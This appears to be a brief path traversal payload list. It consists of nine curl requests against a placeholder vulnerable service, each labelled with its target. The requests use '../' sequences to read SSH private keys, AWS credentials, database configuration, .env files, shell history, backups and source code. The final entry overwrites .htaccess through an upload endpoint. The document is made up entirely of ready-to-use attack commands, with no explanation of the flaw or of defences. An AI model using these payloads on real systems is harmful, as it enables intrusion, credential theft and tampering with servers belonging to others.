-
SSH key file exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.ssh/id_rsa
-
AWS credential exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.aws/credentials
-
Hard-coded secret information exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../config/db_config.php
-
Source code exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../app.js
-
Application’s environment variable information exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../.env
-
Backup file exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../backup/backup.zip
-
Environment variable exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.bashrc
-
Command history exposure
curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.bash_history
- Overwrite .htaccess file
curl https://[VULNERABLE-SERVICE]/upload?filename=../../../../.htaccess